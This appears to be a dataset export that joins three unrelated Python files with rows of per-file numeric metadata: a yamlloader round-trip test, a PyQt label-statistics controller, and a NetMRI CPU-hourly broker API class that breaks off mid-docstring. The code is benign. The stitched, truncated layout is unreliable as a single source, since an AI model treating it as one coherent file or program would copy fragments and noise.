| 0.306263
| 1,453
| 45
| 102
| 32.288889
| 0.688492
| 0
| 0
| 0.666667
| 0
| 0
| 0.081155
| 0.070151
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0
| 0
| 0.181818
| 0.030303
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
466d800ff51a829401b626e9b95173a227d0c8d5
| 71,023
|
py
|
Python
|
tests/test_ext_anatools.py
|
andy-maier/yamlloader
|
13c8d42f63c97309ee1b5a7ac1e7f216c10e1b1c
|
[
"MIT"
] | 9
|
2018-01-18T15:27:11.000Z
|
2020-12-18T04:46:49.000Z
|
tests/test_ext_anatools.py
|
andy-maier/yamlloader
|
13c8d42f63c97309ee1b5a7ac1e7f216c10e1b1c
|
[
"MIT"
] | 12
|
2018-02-08T10:10:53.000Z
|
2022-03-29T22:07:45.000Z
|
tests/test_ext_anatools.py
|
andy-maier/yamlloader
|
13c8d42f63c97309ee1b5a7ac1e7f216c10e1b1c
|
[
"MIT"
] | 2
|
2019-06-22T09:05:50.000Z
|
2021-07-12T18:34:18.000Z
|
from collections import OrderedDict
from unittest import TestCase
import yaml
import yamlloader
config1 = """name: sim1_all_result
model:
categories:
- Mode
pdf:
rare:
sig:
yield: VAR 10000 0 1000000
brem0:
yield: VAR 0.5 0 1
mass:
observable-names:
mass: B_M
pdf: cb
mass_limits:
low: 5000
high: 6000.0
parameters:
mu: VAR 5279 5250 5300
sigma: VAR 14.53 2 100
alpha: VAR 1.097 0.001 4
n: VAR 1.73 0.00001 150
brem1:
yield: VAR 0.5 0 1
mass:
observable-names:
mass: B_M
pdf: doublecb
mass_limits:
low: 5000
high: 6000
parameters:
mu: VAR 5279 5250 5300
sigma1: VAR 14.53 2 100
alpha1: VAR 1.097 0.001 4
n1: VAR 1.73 0.00001 150
sigma2: VAR 14.53 2 100
alpha2: VAR -1.097 -4 -0.001
n2: VAR 1.73 0.00001 150
frac: VAR 0.5 0 1
brem2:
mass:
observable-names:
mass: B_M
pdf: doublecb
mass_limits:
low: 5000
high: 6000
parameters:
shift1: '@shift1/shift1/shift1/VAR 1. 0.5 1.5'
mu_fixed: '@muTrue/muTrue/muTrue/CONST 5279'
mu: SHIFT @muTrue @shift1
sigma1: VAR 14.53 2 100
alpha1: VAR 1.097 0.001 4
n1: VAR 1.73 0.00001 150
sigma2: VAR 14.53 2 100
alpha2: VAR -1.097 -4 -0.001
n2: VAR 1.73 0.00001 150
frac: VAR 0.5 0.3 0.7
comb_bkg:
yield: VAR 4000 0 10000
mass:
observable-names:
mass: B_M
pdf: exponential
mass_limits:
low: 5000
high: 6000
parameters:
tau: VAR -0.0008 -0.1 -0.0001
part_bkg:
yield: VAR 40000 10000 1000000
mass:
observable-names:
mass: B_M
pdf: gaussian
mass_limits:
low: 5000
high: 5400
parameters:
mu: VAR 5100 5001 5100
sigma: VAR 10 0 10000
jpsi:
sig:
yield: VAR 10000 0 1000000
brem0:
yield: VAR 0.5 0 1
mass:
observable-names:
mass: B_M
pdf: cb
mass_limits:
low: 5000
high: 6000.0
parameters:
mu: VAR 5279 5250 5300
sigma: VAR 14.53 2 100
alpha: VAR 1.097 0.001 4
n: VAR 1.73 0.00001 150
brem1:
yield: VAR 0.5 0 1
mass:
observable-names:
mass: B_M
pdf: doublecb
mass_limits:
low: 5000
high: 6000
parameters:
mu: VAR 5279 5250 5300
sigma1: VAR 14.53 2 100
alpha1: VAR 1.097 0.001 4
n1: VAR 1.73 0.00001 150
sigma2: VAR 14.53 2 100
alpha2: VAR -1.097 -4 -0.001
n2: VAR 1.73 0.00001 150
frac: VAR 0.5 0 1
brem2:
mass:
observable-names:
mass: B_M
pdf: doublecb
mass_limits:
low: 5000
high: 6000
parameters:
mu: SHIFT @muTrue @shift1
sigma1: VAR 14.53 2 100
alpha1: VAR 1.097 0.001 4
n1: VAR 1.73 0.00001 150
sigma2: VAR 14.53 2 100
alpha2: VAR -1.097 -4 -0.001
n2: VAR 1.73 0.00001 150
frac: VAR 0.5 0.3 0.7
comb_bkg:
yield: VAR 4000 0 10000
mass:
observable-names:
mass: B_M
pdf: exponential
mass_limits:
low: 5000
high: 6000
parameters:
tau: VAR -0.0008 -0.1 -0.0001
part_bkg:
yield: VAR 40000 10000 1000000
mass:
observable-names:
mass: B_M
pdf: gaussian
mass_limits:
low: 5000
high: 5400
parameters:
mu: VAR 5100 5001 5100
sigma: VAR 10 0 10000
"""
config1_target = OrderedDict(
[
("name", "sim1_all_result"),
(
"model",
OrderedDict(
[
("categories", ["Mode"]),
(
"pdf",
OrderedDict(
[
(
"rare",
OrderedDict(
[
(
"sig",
OrderedDict(
[
(
"yield",
"VAR 10000 " "0 1000000",
),
(
"brem0",
OrderedDict(
[
(
"yield",
"VAR 0.5 0 1",
),
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
(
"pdf",
"cb",
),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
6000.0,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"mu",
"VAR 5279 5250 5300",
),
(
"sigma",
"VAR 14.53 2 100",
),
(
"alpha",
"VAR 1.097 0.001 4",
),
(
"n",
"VAR 1.73 0.00001 150",
),
]
),
),
]
),
),
]
),
),
(
"brem1",
OrderedDict(
[
(
"yield",
"VAR 0.5 0 1",
),
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
(
"pdf",
"doublecb",
),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
6000,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"mu",
"VAR 5279 5250 5300",
),
(
"sigma1",
"VAR 14.53 2 100",
),
(
"alpha1",
"VAR 1.097 0.001 4",
),
(
"n1",
"VAR 1.73 0.00001 150",
),
(
"sigma2",
"VAR 14.53 2 100",
),
(
"alpha2",
"VAR -1.097 -4 -0.001",
),
(
"n2",
"VAR 1.73 0.00001 150",
),
(
"frac",
"VAR 0.5 0 1",
),
]
),
),
]
),
),
]
),
),
(
"brem2",
OrderedDict(
[
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
(
"pdf",
"doublecb",
),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
6000,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"shift1",
"@shift1/shift1/shift1/VAR 1. 0.5 1.5",
),
(
"mu_fixed",
"@muTrue/muTrue/muTrue/CONST 5279",
),
(
"mu",
"SHIFT @muTrue @shift1",
),
(
"sigma1",
"VAR 14.53 2 100",
),
(
"alpha1",
"VAR 1.097 0.001 4",
),
(
"n1",
"VAR 1.73 0.00001 150",
),
(
"sigma2",
"VAR 14.53 2 100",
),
(
"alpha2",
"VAR -1.097 -4 -0.001",
),
(
"n2",
"VAR 1.73 0.00001 150",
),
(
"frac",
"VAR 0.5 0.3 0.7",
),
]
),
),
]
),
)
]
),
),
]
),
),
(
"comb_bkg",
OrderedDict(
[
(
"yield",
"VAR 4000 " "0 10000",
),
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
(
"pdf",
"exponential",
),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
6000,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"tau",
"VAR -0.0008 -0.1 -0.0001",
)
]
),
),
]
),
),
]
),
),
(
"part_bkg",
OrderedDict(
[
(
"yield",
"VAR 40000 "
"10000 "
"1000000",
),
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
("pdf", "gaussian"),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
5400,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"mu",
"VAR 5100 5001 5100",
),
(
"sigma",
"VAR 10 0 10000",
),
]
),
),
]
),
),
]
),
),
]
),
),
(
"jpsi",
OrderedDict(
[
(
"sig",
OrderedDict(
[
(
"yield",
"VAR 10000 " "0 1000000",
),
(
"brem0",
OrderedDict(
[
(
"yield",
"VAR 0.5 0 1",
),
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
(
"pdf",
"cb",
),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
6000.0,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"mu",
"VAR 5279 5250 5300",
),
(
"sigma",
"VAR 14.53 2 100",
),
(
"alpha",
"VAR 1.097 0.001 4",
),
(
"n",
"VAR 1.73 0.00001 150",
),
]
),
),
]
),
),
]
),
),
(
"brem1",
OrderedDict(
[
(
"yield",
"VAR 0.5 0 1",
),
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
(
"pdf",
"doublecb",
),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
6000,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"mu",
"VAR 5279 5250 5300",
),
(
"sigma1",
"VAR 14.53 2 100",
),
(
"alpha1",
"VAR 1.097 0.001 4",
),
(
"n1",
"VAR 1.73 0.00001 150",
),
(
"sigma2",
"VAR 14.53 2 100",
),
(
"alpha2",
"VAR -1.097 -4 -0.001",
),
(
"n2",
"VAR 1.73 0.00001 150",
),
(
"frac",
"VAR 0.5 0 1",
),
]
),
),
]
),
),
]
),
),
(
"brem2",
OrderedDict(
[
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
(
"pdf",
"doublecb",
),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
6000,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"mu",
"SHIFT @muTrue @shift1",
),
(
"sigma1",
"VAR 14.53 2 100",
),
(
"alpha1",
"VAR 1.097 0.001 4",
),
(
"n1",
"VAR 1.73 0.00001 150",
),
(
"sigma2",
"VAR 14.53 2 100",
),
(
"alpha2",
"VAR -1.097 -4 -0.001",
),
(
"n2",
"VAR 1.73 0.00001 150",
),
(
"frac",
"VAR 0.5 0.3 0.7",
),
]
),
),
]
),
)
]
),
),
]
),
),
(
"comb_bkg",
OrderedDict(
[
(
"yield",
"VAR 4000 " "0 10000",
),
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
(
"pdf",
"exponential",
),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
6000,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"tau",
"VAR -0.0008 -0.1 -0.0001",
)
]
),
),
]
),
),
]
),
),
(
"part_bkg",
OrderedDict(
[
(
"yield",
"VAR 40000 "
"10000 "
"1000000",
),
(
"mass",
OrderedDict(
[
(
"observable-names",
OrderedDict(
[
(
"mass",
"B_M",
)
]
),
),
("pdf", "gaussian"),
(
"mass_limits",
OrderedDict(
[
(
"low",
5000,
),
(
"high",
5400,
),
]
),
),
(
"parameters",
OrderedDict(
[
(
"mu",
"VAR 5100 5001 5100",
),
(
"sigma",
"VAR 10 0 10000",
),
]
),
),
]
),
),
]
),
),
]
),
),
]
),
),
]
),
),
]
)
text_target_odict = [(config1, config1_target)]
class TestLoaderDumper(TestCase):
def set_LoadersDumpers(self, loader, dumper):
self.loader = loader
self.dumper = dumper
def test_ordereddict(self):
self.set_LoadersDumpers(
yamlloader.ordereddict.CLoader, dumper=yamlloader.ordereddict.CDumper
)
for yaml_file, yaml_target in text_target_odict:
self.loaddump(dict_to_save=yaml_target, dump_target=yaml_file)
def loaddump(self, dict_to_save, dump_target=None, loader=None, dumper=None):
if loader is None:
loader = self.loader
if dumper is None:
dumper = self.dumper
dumped_dict = yaml.dump(dict_to_save, Dumper=dumper, default_flow_style=False)
if dump_target:
self.assertEqual(dumped_dict, dump_target)
dict_loaded = yaml.load(dumped_dict, Loader=loader)
self.assertEqual(dict_to_save, dict_loaded)
| 72.398573
| 135
| 0.071836
| 1,273
| 71,023
| 3.940299
| 0.095051
| 0.033493
| 0.023923
| 0.035885
| 0.839314
| 0.830542
| 0.830542
| 0.830542
| 0.830542
| 0.830542
| 0
| 0.183726
| 0.90068
| 71,023
| 980
| 136
| 72.472449
| 0.52736
| 0
| 0
| 0.664264
| 0
| 0
| 0.090027
| 0.001492
| 0
| 0
| 0
| 0
| 0.00206
| 1
| 0.00309
| false
| 0
| 0.004119
| 0
| 0.008239
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
467015cba285e8f561874cdccaad2e1b0f0badf2
| 3,434
|
py
|
Python
|
py_labeler/labeler/controller/StatsController.py
|
anhaidgroup/magellan_labeler
|
97583163091cd04a8bfd3824d78291da58f24f9c
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | 5
|
2019-03-13T11:49:35.000Z
|
2021-11-17T01:37:36.000Z
|
py_labeler/labeler/controller/StatsController.py
|
anhaidgroup/magellan_labeler
|
97583163091cd04a8bfd3824d78291da58f24f9c
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | 5
|
2017-12-31T19:00:37.000Z
|
2020-01-29T18:56:47.000Z
|
py_labeler/labeler/controller/StatsController.py
|
anhaidgroup/magellan_labeler
|
97583163091cd04a8bfd3824d78291da58f24f9c
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | 4
|
2017-12-30T17:23:07.000Z
|
2020-02-25T20:49:35.000Z
|
try:
from PyQt5.QtCore import QObject
except ImportError:
raise ImportError('PyQt5 is not installed. Please install PyQt5 to use '
'GUI related functions in py_labeler.')
from py_labeler.utils import ApplicationContext
class StatsController(QObject):
"""
Computes statistics to be displayed
"""
def __init__(self, main_page):
super(StatsController, self).__init__(None)
self.main_page = main_page
def count_matched_tuple_pairs(self, data_frame, label_column_name):
""" Returns a count of tuple pairs whose label value is MATCH.
Args:
data_frame (DataFrame): Pandas data frame with label column.
Returns:
Count of tuple pairs with label == MATCH (int).
Raises:
KeyError if label_column_name is not in data frame
"""
# todo check if assertion is correct thing to do
if label_column_name not in data_frame.columns:
raise KeyError("label column {label_column} not in dataframe".format(label_column=label_column_name))
return data_frame[data_frame[label_column_name] == ApplicationContext.MATCH].shape[0]
def count_non_matched_tuple_pairs(self, data_frame, label_column_name):
"""Returns a count of tuple pairs whose label value is NON-MATCH
Args:
data_frame (DataFrame): Pandas data frame with label column.
Returns:
Count of tuple pairs with label == NON MATCH (int).
Raises:
KeyError if label_column_name is not in data frame
"""
# todo check if assertion is correct thing to do
if label_column_name not in data_frame.columns:
raise KeyError("label column {label_column} not in dataframe".format(label_column=label_column_name))
return data_frame[data_frame[label_column_name] == ApplicationContext.NON_MATCH].shape[0]
def count_not_labeled_tuple_pairs(self, data_frame, label_column_name):
"""Returns a count of tuple pairs whose label value is NOT_LABELED
Args:
data_frame (DataFrame): Pandas data frame with label column.
Returns:
Count of tuple pairs with label == NOT LABELED (int).
Raises:
KeyError if label_column_name is not in data frame
"""
# todo check if assertion is correct thing to do
if label_column_name not in data_frame.columns:
raise KeyError("label column {label_column} not in dataframe".format(label_column=label_column_name))
return data_frame[data_frame[label_column_name] == ApplicationContext.NOT_LABELED].shape[0]
def count_not_sure_tuple_pairs(self, data_frame, label_column_name):
"""Returns a count of tuple pairs whose label value is NOT_SURE
Args:
data_frame (DataFrame): Pandas data frame with label column.
Returns:
Count of tuple pairs with label == NOT SURE (int).
Raises:
KeyError if label_column_name is not in data frame
"""
# todo check if assertion is correct thing to do
if label_column_name not in data_frame.columns:
raise KeyError("label column {label_column} not in dataframe".format(label_column=label_column_name))
return data_frame[data_frame[label_column_name] == ApplicationContext.NOT_SURE].shape[0]
| 39.471264
| 113
| 0.670938
| 454
| 3,434
| 4.852423
| 0.162996
| 0.179755
| 0.136178
| 0.072628
| 0.82887
| 0.802542
| 0.802542
| 0.802542
| 0.802542
| 0.802542
| 0
| 0.002774
| 0.265288
| 3,434
| 86
| 114
| 39.930233
| 0.870392
| 0.372452
| 0
| 0.307692
| 0
| 0
| 0.142318
| 0
| 0
| 0
| 0
| 0.046512
| 0
| 1
| 0.192308
| false
| 0
| 0.153846
| 0
| 0.538462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
46894717b61c99b63e2be204c229bda35ee8a8be
| 42,534
|
py
|
Python
|
infoblox_netmri/api/broker/v3_6_0/device_cpu_hourly_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/device_cpu_hourly_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/device_cpu_hourly_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
from ..broker import Broker
class DeviceCpuHourlyBroker(Broker):
controller = "device_cpu_hourlies"
def index(self, **kwargs):
"""Lists the available device cpu hourlies. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record.
:type DeviceCpuHourlyID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record.
:type DeviceCpuHourlyID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device from which this record was collected.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device from which this record was collected.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StartTime: The starting date/time for the hourly interval.
:type StartTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StartTime: The starting date/time for the hourly interval.
:type StartTime: Array of DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` today
:param starttime: The data returned will represent the device cpu hourlies with this date and time as lower boundary. If omitted, the result will indicate the most recently collected data.
:type starttime: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` tomorrow
:param endtime: The data returned will represent the device cpu hourlies with this date and time as upper boundary. If omitted, the result will indicate the most recently collected data.
:type endtime: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device cpu hourly methods. The listed methods will be called on each device cpu hourly returned and included in the output. Available methods are: data_source, device, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceCpuHourlyID
:param sort: The data field(s) to use for sorting the output. Default is DeviceCpuHourlyID. Valid values are DeviceCpuHourlyID, DataSourceID, DeviceID, StartTime, CpuIndex, CpuBusyMin, CpuBusyAvg, CpuBusyMax.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceCpuHourly. Valid values are DeviceCpuHourlyID, DataSourceID, DeviceID, StartTime, CpuIndex, CpuBusyMin, CpuBusyAvg, CpuBusyMax. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_cpu_hourlies: An array of the DeviceCpuHourly objects that match the specified input criteria.
:rtype device_cpu_hourlies: Array of DeviceCpuHourly
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def show(self, **kwargs):
"""Shows the details for the specified device cpu hourly.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record.
:type DeviceCpuHourlyID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device cpu hourly methods. The listed methods will be called on each device cpu hourly returned and included in the output. Available methods are: data_source, device, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_cpu_hourly: The device cpu hourly identified by the specified DeviceCpuHourlyID.
:rtype device_cpu_hourly: DeviceCpuHourly
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def search(self, **kwargs):
"""Lists the available device cpu hourlies matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param CpuBusyAvg: The mean CPU busy reading during the hour.
:type CpuBusyAvg: Float
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param CpuBusyAvg: The mean CPU busy reading during the hour.
:type CpuBusyAvg: Array of Float
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param CpuBusyMax: The maximum CPU busy reading during the hour.
:type CpuBusyMax: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param CpuBusyMax: The maximum CPU busy reading during the hour.
:type CpuBusyMax: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param CpuBusyMin: The minimum CPU busy reading during the hour.
:type CpuBusyMin: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param CpuBusyMin: The minimum CPU busy reading during the hour.
:type CpuBusyMin: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param CpuIndex: The CPU number.
:type CpuIndex: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param CpuIndex: The CPU number.
:type CpuIndex: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record.
:type DeviceCpuHourlyID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceCpuHourlyID: The internal NetMRI identifier for this Device CPU Hourly record.
:type DeviceCpuHourlyID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device from which this record was collected.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device from which this record was collected.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StartTime: The starting date/time for the hourly interval.
:type StartTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StartTime: The starting date/time for the hourly interval.
:type StartTime: Array of DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` today
:param starttime: The data returned will represent the device cpu hourlies with this date and time as lower boundary. If omitted, the result will indicate the most recently collected data.
:type starttime: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` tomorrow
:param endtime: The data returned will represent the device cpu hourlies with this date and time as upper boundary. If omitted, the result will indicate the most recently collected data.
:type endtime: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device cpu hourly methods. The listed methods will be called on each device cpu hourly returned and included in the output. Available methods are: data_source, device, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceCpuHourlyID
:param sort: The data field(s) to use for sorting the output. Default is DeviceCpuHourlyID. Valid values are DeviceCpuHourlyID, DataSourceID, DeviceID, StartTime, CpuIndex, CpuBusyMin, CpuBusyAvg, CpuBusyMax.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceCpuHourly. Valid values are DeviceCpuHourlyID, DataSourceID, DeviceID, StartTime, CpuIndex, CpuBusyMin, CpuBusyAvg, CpuBusyMax. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against device cpu hourlies, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: CpuBusyAvg, CpuBusyMax, CpuBusyMin, CpuIndex, DataSourceID, DeviceCpuHourlyID, DeviceID, StartTime.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
